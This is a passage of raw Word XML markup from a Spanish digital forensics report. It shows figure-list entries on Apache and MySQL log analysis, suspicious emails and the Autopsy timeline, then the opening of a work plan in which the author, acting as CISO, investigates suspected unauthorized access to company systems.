        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29D349B0" w14:textId="733C3F0E"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70" w:anchor="_Toc155782618" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis de Apache access.log.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782618 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>51</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="29BEA381" w14:textId="226B1C98"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71" w:anchor="_Toc155782619" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis de Apache error.log.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782619 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1193590B" w14:textId="3E1EB075"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72" w:anchor="_Toc155782620" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis de MySQL.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782620 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>53</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5CCBB1EB" w14:textId="372AB1F6"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73" w:anchor="_Toc155782621" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Detección de Virus por parte de Windows Defender.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782621 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>53</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D7563AF" w14:textId="40E4FDE9"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74" w:anchor="_Toc155782622" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Análisis del código de index.php.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782622 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>53</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B7DE5D9" w14:textId="56EECDAF"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75" w:anchor="_Toc155782623" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Listado de mails encontrados.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782623 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="57E7954A" w14:textId="4A5CA91F"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76" w:anchor="_Toc155782624" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Primera notificación de anatoly5676.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782624 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A57219B" w14:textId="6EF066E7"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77" w:anchor="_Toc155782625" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Web de guerrillamail.com y correo notificación de cambio de contraseña de anatoly5676.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782625 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2BB11C77" w14:textId="3C5BB8F5"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78" w:anchor="_Toc155782626" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Correo de anatoly5676 en blanco y origen de la IP 193.138.185.59.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782626 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>55</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="449DBCF3" w14:textId="3B0DD0C5"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79" w:anchor="_Toc155782627" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Correo de anatoly5676 indicando visitar una web y origen de la IP 18.195.165.56.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782627 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>55</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72668732" w14:textId="033CE361"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80" w:anchor="_Toc155782628" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Correo de anatoly5676 añadiendo un script al correo y análisis de index.db.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782628 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>56</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="625D8FF5" w14:textId="5CA78AA4"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81" w:anchor="_Toc155782629" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Extracto de cuentas de correo parecidas o similares a las de anatoly5676.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782629 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>56</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A68A184" w14:textId="6F926809" w:rsidR="00C4245F" w:rsidRDefault="00C4245F">
      <w:pPr>
        <w:pStyle w:val="Tabladeilustraciones"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:kern w:val="2"/>
          <w:szCs w:val="22"/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId82" w:anchor="_Toc155782630" w:history="1">
        <w:r w:rsidRPr="006B7BBD">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Herramienta línea del Tiempo de Autopsy.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc155782630 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00117A4E">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>56</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2DD6A080" w14:textId="5B0913ED" w:rsidR="00C054D3" w:rsidRPr="00490E1A" w:rsidRDefault="00562105" w:rsidP="00C054D3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD82D49" w14:textId="77777777" w:rsidR="00D457DA" w:rsidRPr="00490E1A" w:rsidRDefault="00D457DA" w:rsidP="00C054D3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="360"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D457DA" w:rsidRPr="00490E1A" w:rsidSect="00B93CA3">
          <w:footerReference w:type="default" r:id="rId83"/>
          <w:footerReference w:type="first" r:id="rId84"/>
          <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1701" w:bottom="1418" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68987172" w14:textId="77777777" w:rsidR="0099135C" w:rsidRPr="00490E1A" w:rsidRDefault="00403CFF">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc306971759"/>
      <w:bookmarkStart w:id="3" w:name="_Toc155782495"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00490E1A">
        <w:rPr>
          <w:rFonts w:eastAsia="Arial"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Plan de trabajo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="3B4512CF" w14:textId="77777777" w:rsidR="004021D3" w:rsidRPr="00F149F6" w:rsidRDefault="004021D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12591333" w14:textId="62724AEE" w:rsidR="00C60674" w:rsidRPr="003C35F0" w:rsidRDefault="00C60674">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="003C35F0" w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="003C35F0" w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155730947 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidR="003C35F0" w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="003C35F0" w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia I.</w:t>
      </w:r>
      <w:r w:rsidR="003C35F0" w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003C35F0">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E187818" w14:textId="4E1B8F66" w:rsidR="008417CC" w:rsidRPr="00F149F6" w:rsidRDefault="008417CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F149F6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">La </w:t>
      </w:r>
      <w:r w:rsidRPr="00F149F6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>situación</w:t>
      </w:r>
      <w:r w:rsidRPr="00F149F6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la que nos encontramos es un caso práctico laboral, en el que realizamos el papel de CISO.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8419FF" w14:textId="22087561" w:rsidR="00452242" w:rsidRPr="00F149F6" w:rsidRDefault="008417CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F149F6">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>En este caso, la dirección de la empresa tiene serias sospechas, no probadas, de que han accedido a los sistemas de forma ilícita. Por lo que el gerente de la empresa me solicita, como CISO, que se compruebe si realmente han accedido, así como el método que han utilizado. Por otro lado, solicitan las consecuencias que se derivan del dicho acceso, si ha habido extracción de información alguna.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE484A7" w14:textId="77777777" w:rsidR="002135A8" w:rsidRPr="00F149F6" w:rsidRDefault="002135A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DA886DE" w14:textId="16CDD1A1" w:rsidR="002135A8" w:rsidRPr="00490E1A" w:rsidRDefault="00490E1A" w:rsidP="00490E1A">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc155782496"/>
      <w:r w:rsidRPr="00490E1A">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00FE40D2">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Problema por resolver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="3206A3E9" w14:textId="77777777" w:rsidR="002135A8" w:rsidRDefault="002135A8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C9FE27" w14:textId="1B7AD2FF" w:rsidR="003C35F0" w:rsidRPr="003C35F0" w:rsidRDefault="003C35F0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
